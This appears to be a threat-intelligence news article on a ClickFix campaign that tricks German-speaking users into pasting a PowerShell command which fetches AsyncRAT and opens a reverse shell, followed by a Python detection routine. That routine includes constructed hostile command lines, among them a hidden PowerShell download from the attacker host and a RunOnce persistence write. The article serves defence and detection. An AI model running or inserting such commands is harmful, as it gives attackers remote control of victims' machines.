
In a recent investigation, threat intelligence firm CloudSEK uncovered a stealthy, fileless malware campaign leveraging social engineering and native system tools to deliver AsyncRAT, a remote access trojan. Branded as a “Clickfix” attack, the campaign is designed to lure German-speaking users into self-executing an obfuscated PowerShell payload — all without dropping a single file to disk.
“The malware is delivered via a fake verification prompt that lures users into executing a malicious command,” CloudSEK notes.
The campaign starts with a webpage mimicking a CAPTCHA verification screen. When users click “I’m not a robot,” a PowerShell command is copied to their clipboard. They are then instructed to paste and execute this command in their terminal under the guise of verifying their identity. The German-language text of this prompt suggests with high confidence that “the campaign is targeted towards German speaking users”, according to CloudSEK’s attribution efforts.
Once executed, the PowerShell payload triggers a multi-stage infection chain:
- Step 1: Uses conhost.exe to invoke PowerShell in headless mode.
- Step 2: Downloads an obfuscated payload from namoet[.]de:80/x.
- Step 3: Decodes and executes the payload entirely in memory using PowerShell’s Add-Type feature.
“The malware establishes persistence through registry keys and connects to a remote TCP C2 server on port 4444,” the report confirms.
This fileless approach not only reduces forensic artifacts but also enables deep system access. The decrypted payload compiles and loads C# code in memory, establishing a reverse TCP shell to namoet[.]de:4444, giving the attacker full control over the victim’s machine.
The threat actors employ a clever technique: they reverse base64-encoded C# code, compile it using PowerShell, and invoke it using a static method. One example:
This approach matches AsyncRAT’s known TTPs:
- T1059.001: PowerShell Execution
- T1127.001: In-memory Compilation After Delivery
- T1547.001: Registry Persistence using HKCU:\RunOnce
- T1071.001 / T1571: Application Layer Protocol with Non-Standard Ports (TCP 4444)
“The payload includes typical byte[] handling, process injection, and embedded base64 C# in a reversed format,” which directly aligns with AsyncRAT staging behaviors.
The malware ensures re-execution at next logon by adding registry keys under:
- HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Additionally, CloudSEK observed the following evasion techniques:
- No files written to disk
- Anti-debugging via obfuscated commands
- Disabling Windows Defender
- Using LOLBins like conhost.exe and powershell.exe
Given its sophistication and stealth, the Clickfix AsyncRAT campaign requires a multi-layered defense strategy:
- Block suspicious PowerShell execution, especially headless or hidden instances.
- Monitor registry modifications, particularly in Run and RunOnce keys.
- Implement memory scanning tools to detect in-memory C# compilation and obfuscated payloads.
- Use threat intelligence feeds to block known IOCs such as namoet[.]de and port 4444.
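As an added illustration of the monitoring recommended above (example code written for this article, not from CloudSEK's report), the following Python triage routine scores process command lines against the chain described here: conhost.exe headless launches, hidden PowerShell windows, Add-Type in-memory compilation, writes to the listed RunOnce keys, the published IOCs, and reversed base64 blobs that decode to C# source. The sample command lines and the C# stub are constructed; the indicator names are this example's own.

```python
import base64
import binascii
import re

# Constructed sample: a benign C# stub, base64-encoded and then reversed, planted in a
# PowerShell command line the way the report describes the staged payload.
CSHARP_STUB = "using System; public class Stage { public static void Run() { } }"
REVERSED_B64 = base64.b64encode(CSHARP_STUB.encode()).decode()[::-1]

# Constructed process command lines, modelled on what a Sysmon Event ID 1 feed carries.
SAMPLE_EVENTS = [
    'conhost.exe --headless powershell.exe -w hidden -c "iwr http://namoet[.]de:80/x"',
    "powershell.exe -c \"$s='" + REVERSED_B64 + "'; Add-Type -TypeDefinition $src\"",
    'powershell.exe -c "Set-ItemProperty HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce -Name u -Value ..."',
    'notepad.exe C:\\Users\\alice\\notes.txt',
]

B64_TOKEN = re.compile(r"[A-Za-z0-9+/=]{40,}")
CSHARP_MARKERS = ("using System", "public static", "namespace ")

def recover_reversed_csharp(text):
    """Reverse each long base64-looking token, decode it, and return the first
    result that looks like C# source; None if nothing in the text matches."""
    for token in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token[::-1], validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if any(marker in decoded for marker in CSHARP_MARKERS):
            return decoded
    return None

def classify(cmdline):
    """Return the set of campaign indicators present in one command line."""
    low = cmdline.lower()
    hits = set()
    if "conhost.exe" in low and "headless" in low:
        hits.add("conhost_headless")
    if "powershell" in low and re.search(r"-w(?:indowstyle)?\s+hidden", low):
        hits.add("hidden_powershell")
    if "add-type" in low:
        hits.add("in_memory_compile")
    if "currentversion\\runonce" in low or "windows nt\\currentversion\\windows" in low:
        hits.add("persistence_key")
    if "namoet[.]de" in low or ":4444" in low:
        hits.add("known_ioc")
    if recover_reversed_csharp(cmdline) is not None:
        hits.add("reversed_b64_csharp")
    return hits

def triage(events):
    """Map each suspicious event index to its sorted indicators; clean events are omitted."""
    return {i: sorted(classify(e)) for i, e in enumerate(events) if classify(e)}
```

A single indicator such as Add-Type is common in legitimate administration; the value of the routine is in correlating several of them on one host in a short window.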